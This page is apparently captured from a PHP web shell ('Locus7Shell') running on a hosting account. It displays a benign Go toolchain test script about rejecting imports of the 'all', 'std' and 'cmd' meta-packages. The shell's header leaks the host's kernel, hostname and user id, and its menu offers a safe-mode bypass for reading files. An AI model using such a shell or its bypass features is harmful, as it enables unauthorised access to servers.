![]() | |
---|---|
Software: Apache. PHP/5.4.45 uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue uid=243112(mycochar) gid=100(users) groups=100(users) Safe-mode: OFF (not secure) /home/mycochar/www/image/photo/go/src/cmd/go/testdata/script/ drwxr-xr-x |
Viewing file: Select action/file-type: # The loader should not attempt to resolve imports of the "all", "std", and "cmd" meta-packages. ! go list -deps ./importall ! stderr 'internal error' stderr '^importall[/\\]x.go:3:8: "all" is not an importable package; see ''go help packages''$' ! go list -deps ./importcmd ! stderr 'internal error' stderr '^importcmd[/\\]x.go:3:8: "cmd" is not an importable package; see ''go help packages''$' ! go list -deps ./importstd ! stderr 'internal error' stderr '^importstd[/\\]x.go:3:8: "std" is not an importable package; see ''go help packages''$' # Not even if such a path is theoretically provided by a (necessarily replaced) module. go mod edit -replace std@v0.1.0=./modstd go mod edit -require std@v0.1.0 ! go list -deps ./importstd stderr '^importstd[/\\]x.go:3:8: "std" is not an importable package; see ''go help packages''$' -- go.mod -- module example.com go 1.16 -- importall/x.go -- package importall import _ "all" -- importcmd/x.go -- package importcmd import _ "cmd" -- importstd/x.go -- package importstd import _ "std" -- modstd/go.mod -- module std go 1.16 -- modstd/std.go -- // Package std is an incredibly confusingly-named package. package std |
Useful Commands
|
Php Safe-Mode Bypass (Read Files)
|
--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0059 ]-- |